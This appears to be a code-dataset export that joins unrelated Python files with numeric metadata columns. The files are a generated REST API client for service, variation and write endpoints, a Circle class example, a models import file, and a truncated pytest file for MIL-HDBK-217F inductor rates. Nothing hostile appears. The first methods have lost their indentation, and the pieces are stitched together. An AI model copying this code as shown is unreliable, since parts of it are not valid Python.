return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def services_get(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[Service]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.services_get_with_http_info(**kwargs)
else:
(data) = self.services_get_with_http_info(**kwargs)
return data
def services_get_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[Service]
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method services_get" % key
)
params[key] = val
del params['kwargs']
resource_path = '/services/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Service]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def services_open_get(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_open_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ID of service to open (required)
:return: Service
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.services_open_get_with_http_info(id, **kwargs)
else:
(data) = self.services_open_get_with_http_info(id, **kwargs)
return data
def services_open_get_with_http_info(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_open_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ID of service to open (required)
:return: Service
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method services_open_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `services_open_get`")
resource_path = '/services/open/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Service',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def services_post(self, service, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_post(service, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ServiceRequest service: Service to create. (required)
:return: Service
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.services_post_with_http_info(service, **kwargs)
else:
(data) = self.services_post_with_http_info(service, **kwargs)
return data
def services_post_with_http_info(self, service, **kwargs):
    """Create a service and return the response with HTTP info.

    Synchronous by default; supplying ``callback`` makes the request
    asynchronous and the request thread is returned instead.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.services_post_with_http_info(service, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param ServiceRequest service: Service to create. (required)
    :return: Service
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when ``service`` is None.
    """
    # Reject any keyword argument this endpoint does not understand.
    recognized = ('callback', '_return_http_data_only')
    params = {'service': service}
    for name, value in kwargs.items():
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method services_post" % name
            )
        params[name] = value
    if params['service'] is None:
        raise ValueError("Missing the required parameter `service` when calling `services_post`")

    header_params = {}
    # Only advertise an Accept header when the client selected one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type([])

    return self.api_client.call_api(
        '/services/'.replace('{format}', 'json'), 'POST',
        {},   # no path parameters
        {},   # no query parameters
        header_params,
        body=params['service'],
        post_params=[],
        files={},
        response_type='Service',
        auth_settings=['APIKey', 'AccountID'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'))
def services_put(self, id, service, **kwargs):
    """Update a service.

    The call is synchronous unless a ``callback`` function is supplied,
    in which case the request runs asynchronously and the request
    thread is returned; the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.services_put(id, service, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: ID of the service to update (required)
    :param ServiceRequest service: New service data to set. (required)
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous: hand back the request thread immediately.
        return self.services_put_with_http_info(id, service, **kwargs)
    # Synchronous: return the deserialized response body.
    return self.services_put_with_http_info(id, service, **kwargs)
def services_put_with_http_info(self, id, service, **kwargs):
    """Update a service and return the response with HTTP info.

    Synchronous by default; supplying ``callback`` makes the request
    asynchronous and the request thread is returned instead.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.services_put_with_http_info(id, service, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: ID of the service to update (required)
    :param ServiceRequest service: New service data to set. (required)
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when ``id`` or ``service`` is None.
    """
    # Reject any keyword argument this endpoint does not understand.
    recognized = ('callback', '_return_http_data_only')
    params = {'id': id, 'service': service}
    for name, value in kwargs.items():
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method services_put" % name
            )
        params[name] = value
    # Both endpoint arguments are mandatory.
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `services_put`")
    if params['service'] is None:
        raise ValueError("Missing the required parameter `service` when calling `services_put`")

    header_params = {}
    # Only advertise an Accept header when the client selected one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type([])

    return self.api_client.call_api(
        '/services/'.replace('{format}', 'json'), 'PUT',
        {},                      # no path parameters
        {'id': params['id']},    # target service selected via query string
        header_params,
        body=params['service'],
        post_params=[],
        files={},
        response_type='Response',
        auth_settings=['APIKey', 'AccountID'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'))
def variation_delete(self, id, **kwargs):
    """Remove a variation.

    The call is synchronous unless a ``callback`` function is supplied,
    in which case the request runs asynchronously and the request
    thread is returned; the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.variation_delete(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: variation id to remove (required)
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous: hand back the request thread immediately.
        return self.variation_delete_with_http_info(id, **kwargs)
    # Synchronous: return the deserialized response body.
    return self.variation_delete_with_http_info(id, **kwargs)
def variation_delete_with_http_info(self, id, **kwargs):
    """Remove a variation and return the response with HTTP info.

    Synchronous by default; supplying ``callback`` makes the request
    asynchronous and the request thread is returned instead.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.variation_delete_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: variation id to remove (required)
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when ``id`` is None.
    """
    # Reject any keyword argument this endpoint does not understand.
    recognized = ('callback', '_return_http_data_only')
    params = {'id': id}
    for name, value in kwargs.items():
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method variation_delete" % name
            )
        params[name] = value
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `variation_delete`")

    header_params = {}
    # Only advertise an Accept header when the client selected one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type([])

    return self.api_client.call_api(
        '/variation/'.replace('{format}', 'json'), 'DELETE',
        {},                      # no path parameters
        {'id': params['id']},    # variation selected via query string
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='Response',
        auth_settings=['APIKey', 'AccountID'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'))
def variation_get(self, id, **kwargs):
    """Fetch a variation.

    The call is synchronous unless a ``callback`` function is supplied,
    in which case the request runs asynchronously and the request
    thread is returned; the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.variation_get(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Variation ID to open. (required)
    :return: Variation
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous: hand back the request thread immediately.
        return self.variation_get_with_http_info(id, **kwargs)
    # Synchronous: return the deserialized response body.
    return self.variation_get_with_http_info(id, **kwargs)
def variation_get_with_http_info(self, id, **kwargs):
    """Fetch a variation and return the response with HTTP info.

    Synchronous by default; supplying ``callback`` makes the request
    asynchronous and the request thread is returned instead.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.variation_get_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Variation ID to open. (required)
    :return: Variation
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when ``id`` is None.
    """
    # Reject any keyword argument this endpoint does not understand.
    recognized = ('callback', '_return_http_data_only')
    params = {'id': id}
    for name, value in kwargs.items():
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method variation_get" % name
            )
        params[name] = value
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `variation_get`")

    header_params = {}
    # Only advertise an Accept header when the client selected one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type([])

    return self.api_client.call_api(
        '/variation/'.replace('{format}', 'json'), 'GET',
        {},                      # no path parameters
        {'id': params['id']},    # variation selected via query string
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='Variation',
        auth_settings=['APIKey', 'AccountID'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'))
def variation_post(self, id, item, **kwargs):
    """Create a variation bound to an item.

    The call is synchronous unless a ``callback`` function is supplied,
    in which case the request runs asynchronously and the request
    thread is returned; the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.variation_post(id, item, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Valid item id to bind variation to. (required)
    :param Variation item: Variation information. (required)
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous: hand back the request thread immediately.
        return self.variation_post_with_http_info(id, item, **kwargs)
    # Synchronous: return the deserialized response body.
    return self.variation_post_with_http_info(id, item, **kwargs)
def variation_post_with_http_info(self, id, item, **kwargs):
    """Create a variation and return the response with HTTP info.

    Synchronous by default; supplying ``callback`` makes the request
    asynchronous and the request thread is returned instead.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.variation_post_with_http_info(id, item, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Valid item id to bind variation to. (required)
    :param Variation item: Variation information. (required)
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when ``id`` or ``item`` is None.
    """
    # Reject any keyword argument this endpoint does not understand.
    recognized = ('callback', '_return_http_data_only')
    params = {'id': id, 'item': item}
    for name, value in kwargs.items():
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method variation_post" % name
            )
        params[name] = value
    # Both endpoint arguments are mandatory.
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `variation_post`")
    if params['item'] is None:
        raise ValueError("Missing the required parameter `item` when calling `variation_post`")

    header_params = {}
    # Only advertise an Accept header when the client selected one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type([])

    return self.api_client.call_api(
        '/variation/'.replace('{format}', 'json'), 'POST',
        {},                      # no path parameters
        {'id': params['id']},    # owning item selected via query string
        header_params,
        body=params['item'],
        post_params=[],
        files={},
        response_type='Response',
        auth_settings=['APIKey', 'AccountID'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'))
def variation_put(self, id, item, **kwargs):
    """Update a variation.

    The call is synchronous unless a ``callback`` function is supplied,
    in which case the request runs asynchronously and the request
    thread is returned; the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.variation_put(id, item, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: variation id to update. (required)
    :param Variation item: New variation information. (required)
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous: hand back the request thread immediately.
        return self.variation_put_with_http_info(id, item, **kwargs)
    # Synchronous: return the deserialized response body.
    return self.variation_put_with_http_info(id, item, **kwargs)
def variation_put_with_http_info(self, id, item, **kwargs):
    """Update a variation and return the response with HTTP info.

    Synchronous by default; supplying ``callback`` makes the request
    asynchronous and the request thread is returned instead.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.variation_put_with_http_info(id, item, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: variation id to update. (required)
    :param Variation item: New variation information. (required)
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when ``id`` or ``item`` is None.
    """
    # Reject any keyword argument this endpoint does not understand.
    recognized = ('callback', '_return_http_data_only')
    params = {'id': id, 'item': item}
    for name, value in kwargs.items():
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method variation_put" % name
            )
        params[name] = value
    # Both endpoint arguments are mandatory.
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `variation_put`")
    if params['item'] is None:
        raise ValueError("Missing the required parameter `item` when calling `variation_put`")

    header_params = {}
    # Only advertise an Accept header when the client selected one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type([])

    return self.api_client.call_api(
        '/variation/'.replace('{format}', 'json'), 'PUT',
        {},                      # no path parameters
        {'id': params['id']},    # variation selected via query string
        header_params,
        body=params['item'],
        post_params=[],
        files={},
        response_type='Response',
        auth_settings=['APIKey', 'AccountID'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'))
def write_delete(self, **kwargs):
    """Delete the event attached to a service.

    The call is synchronous unless a ``callback`` function is supplied,
    in which case the request runs asynchronously and the request
    thread is returned; the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.write_delete(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Will delete event attached to this serviceid
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous: hand back the request thread immediately.
        return self.write_delete_with_http_info(**kwargs)
    # Synchronous: return the deserialized response body.
    return self.write_delete_with_http_info(**kwargs)
def write_delete_with_http_info(self, **kwargs):
    """Delete the event attached to a service, with HTTP info.

    Synchronous by default; supplying ``callback`` makes the request
    asynchronous and the request thread is returned instead.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.write_delete_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Will delete event attached to this serviceid
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    """
    # Unlike most endpoints, ``id`` is optional here and arrives only
    # through **kwargs.
    recognized = ('id', 'callback', '_return_http_data_only')
    params = {}
    for name, value in kwargs.items():
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method write_delete" % name
            )
        params[name] = value

    query_params = {}
    if 'id' in params:
        query_params['id'] = params['id']

    header_params = {}
    # Only advertise an Accept header when the client selected one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type([])

    return self.api_client.call_api(
        '/write/'.replace('{format}', 'json'), 'DELETE',
        {},   # no path parameters
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='Response',
        auth_settings=['APIKey', 'AccountID'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'))
def write_post(self, event_request, **kwargs):
    """Will override the current event of the specified service.

    The call is synchronous unless a ``callback`` function is supplied,
    in which case the request runs asynchronously and the request
    thread is returned; the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.write_post(event_request, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param EventRequest event_request: Event to upload (required)
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous: hand back the request thread immediately.
        return self.write_post_with_http_info(event_request, **kwargs)
    # Synchronous: return the deserialized response body.
    return self.write_post_with_http_info(event_request, **kwargs)
def write_post_with_http_info(self, event_request, **kwargs):
    """Will override the current event of the specified service.

    Returns the response together with HTTP info. Synchronous by
    default; supplying ``callback`` makes the request asynchronous and
    the request thread is returned instead.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.write_post_with_http_info(event_request, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param EventRequest event_request: Event to upload (required)
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when ``event_request`` is None.
    """
    # Reject any keyword argument this endpoint does not understand.
    recognized = ('callback', '_return_http_data_only')
    params = {'event_request': event_request}
    for name, value in kwargs.items():
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method write_post" % name
            )
        params[name] = value
    if params['event_request'] is None:
        raise ValueError("Missing the required parameter `event_request` when calling `write_post`")

    header_params = {}
    # Only advertise an Accept header when the client selected one.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type([])

    return self.api_client.call_api(
        '/write/'.replace('{format}', 'json'), 'POST',
        {},   # no path parameters
        {},   # no query parameters
        header_params,
        body=params['event_request'],
        post_params=[],
        files={},
        response_type='Response',
        auth_settings=['APIKey', 'AccountID'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'))
| 38.353508
| 106
| 0.543808
| 11,105
| 111,532
| 5.260603
| 0.024403
| 0.073949
| 0.025882
| 0.033277
| 0.968281
| 0.96015
| 0.954912
| 0.950461
| 0.93889
| 0.914463
| 0
| 0.000143
| 0.372521
| 111,532
| 2,907
| 107
| 38.366701
| 0.834605
| 0.324024
| 0
| 0.816312
| 1
| 0
| 0.141969
| 0.026875
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040411
| false
| 0
| 0.005143
| 0
| 0.105805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bdd0765b4df1d053df5b4bcae0fe5e70b474232a
| 674
|
py
|
Python
|
python/Chapter1/Chapter1/testCircle.py
|
wboswall/academia
|
1571e8f9aceb21564f601cb79120ae56068fe3dd
|
[
"MIT"
] | null | null | null |
python/Chapter1/Chapter1/testCircle.py
|
wboswall/academia
|
1571e8f9aceb21564f601cb79120ae56068fe3dd
|
[
"MIT"
] | null | null | null |
python/Chapter1/Chapter1/testCircle.py
|
wboswall/academia
|
1571e8f9aceb21564f601cb79120ae56068fe3dd
|
[
"MIT"
] | null | null | null |
class Circle1:
    """Circle with a validated mutator and a method-style area."""

    def __init__(self, radius):
        # NOTE(review): the initial radius is not validated here — only
        # setRadius() rejects negative values.
        self.__radius = radius

    def setRadius(self, newValue):
        """Replace the radius; reject values below zero."""
        if newValue >= 0:
            self.__radius = newValue
        else:
            raise ValueError("Value must be positive")

    def area(self):
        """Return the area using the approximation pi = 3.14159."""
        return 3.14159 * (self.__radius ** 2)
class Circle2:
    """Circle exposing ``radius`` as a write-only property and ``area``
    as a read-only computed property."""

    def __init__(self, radius):
        # NOTE(review): the initial radius bypasses the property's
        # validation.
        self.__radius = radius

    def __validated_set(self, newValue):
        """Property setter: accept only values >= 0."""
        if newValue >= 0:
            self.__radius = newValue
        else:
            raise ValueError("Value must be positive")

    # Write-only property: no getter, so reading ``radius`` raises
    # AttributeError.
    radius = property(None, __validated_set)

    @property
    def area(self):
        """Area computed from the current radius (pi = 3.14159)."""
        return 3.14159 * (self.__radius ** 2)
| 26.96
| 56
| 0.591988
| 75
| 674
| 5
| 0.333333
| 0.213333
| 0.058667
| 0.090667
| 0.842667
| 0.842667
| 0.842667
| 0.842667
| 0.842667
| 0.661333
| 0
| 0.038627
| 0.308605
| 674
| 24
| 57
| 28.083333
| 0.766094
| 0
| 0
| 0.7
| 0
| 0
| 0.065379
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0
| 0
| 0.1
| 0.55
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
bdfcf5be805101420038f36ebccd59c4d36c40f2
| 117
|
py
|
Python
|
users/models/__init__.py
|
masssoud/hr-plus
|
96e6e10a87e6d09c6363b2078352b642a7b5e239
|
[
"MIT"
] | null | null | null |
users/models/__init__.py
|
masssoud/hr-plus
|
96e6e10a87e6d09c6363b2078352b642a7b5e239
|
[
"MIT"
] | 1
|
2020-06-10T06:34:36.000Z
|
2020-06-10T06:34:36.000Z
|
users/models/__init__.py
|
masssoud/hr-plus
|
96e6e10a87e6d09c6363b2078352b642a7b5e239
|
[
"MIT"
] | 3
|
2020-03-16T09:50:46.000Z
|
2020-04-29T07:03:09.000Z
|
from users.models.team import Team
from users.models.profile import Profile
from users.models.project import Project
| 29.25
| 40
| 0.846154
| 18
| 117
| 5.5
| 0.388889
| 0.272727
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 117
| 3
| 41
| 39
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
da10b02dd734ee99be91b93174bf30f6a3fa8523
| 19,714
|
py
|
Python
|
tests/analyses/milhdbk217f/models/inductor_unit_test.py
|
weibullguy/ramstk
|
3ec41d7e2933045a7a8028aed6c6b04365495095
|
[
"BSD-3-Clause"
] | 4
|
2018-08-26T09:11:36.000Z
|
2019-05-24T12:01:02.000Z
|
tests/analyses/milhdbk217f/models/inductor_unit_test.py
|
weibullguy/ramstk
|
3ec41d7e2933045a7a8028aed6c6b04365495095
|
[
"BSD-3-Clause"
] | 52
|
2018-08-24T12:51:22.000Z
|
2020-12-28T04:59:42.000Z
|
tests/analyses/milhdbk217f/models/inductor_unit_test.py
|
weibullguy/ramstk
|
3ec41d7e2933045a7a8028aed6c6b04365495095
|
[
"BSD-3-Clause"
] | 1
|
2018-10-11T07:57:55.000Z
|
2018-10-11T07:57:55.000Z
|
# pylint: skip-file
# type: ignore
# -*- coding: utf-8 -*-
#
# tests.analyses.milhdbk217f.models.inductor_unit_test.py is part of The
# RAMSTK Project
#
# All rights reserved.
# Copyright since 2007 Doyle "weibullguy" Rowland doyle.rowland <AT> reliaqual <DOT> com
"""Test class for the inductor module."""
# Third Party Imports
import pytest
# RAMSTK Package Imports
from ramstk.analyses.milhdbk217f import inductor
@pytest.mark.unit
@pytest.mark.parametrize("family_id", [1, 2, 3, 4])
@pytest.mark.parametrize(
    "environment_active_id",
    [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
)
def test_get_part_count_lambda_b_xfmr(family_id, environment_active_id):
    """get_part_count_lambda_b() should return a float value for the base
    hazard rate of a transformer (subcategory 1) on success."""
    # MIL-HDBK-217F parts-count table: family -> rate per environment.
    _expected = {
        1: [0.0035, 0.023, 0.049, 0.019, 0.065, 0.027, 0.037, 0.041,
            0.052, 0.11, 0.0018, 0.053, 0.16, 2.3],
        2: [0.0071, 0.046, 0.097, 0.038, 0.13, 0.055, 0.073, 0.081,
            0.10, 0.22, 0.035, 0.11, 0.31, 4.7],
        3: [0.023, 0.16, 0.35, 0.13, 0.45, 0.21, 0.27, 0.35,
            0.45, 0.82, 0.011, 0.37, 1.2, 16.0],
        4: [0.028, 0.18, 0.39, 0.15, 0.52, 0.22, 0.29, 0.33,
            0.42, 0.88, 0.015, 0.42, 1.2, 19.0],
    }

    _lambda_b = inductor.get_part_count_lambda_b(
        1,
        environment_active_id,
        family_id,
    )

    assert isinstance(_lambda_b, float)
    # Environment IDs are 1-based; the table rows are 0-based.
    assert _lambda_b == _expected[family_id][environment_active_id - 1]
@pytest.mark.unit
@pytest.mark.parametrize("family_id", [1, 2])
@pytest.mark.parametrize(
    "environment_active_id",
    [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
)
def test_get_part_count_lambda_b_inductor(family_id, environment_active_id):
    """get_part_count_lambda_b() should return a float value for the base
    hazard rate of a coil (subcategory 2) on success."""
    # MIL-HDBK-217F parts-count table: family -> rate per environment.
    _expected = {
        1: [0.0017, 0.0073, 0.023, 0.0091, 0.031, 0.011, 0.015, 0.016,
            0.022, 0.052, 0.00083, 0.25, 0.073, 1.1],
        2: [0.0033, 0.015, 0.046, 0.018, 0.061, 0.022, 0.03, 0.033,
            0.044, 0.10, 0.0017, 0.05, 0.15, 2.2],
    }

    _lambda_b = inductor.get_part_count_lambda_b(
        2,
        environment_active_id,
        family_id,
    )

    assert isinstance(_lambda_b, float)
    # Environment IDs are 1-based; the table rows are 0-based.
    assert _lambda_b == _expected[family_id][environment_active_id - 1]
@pytest.mark.unit
def test_get_part_count_lambda_b_no_subcategory():
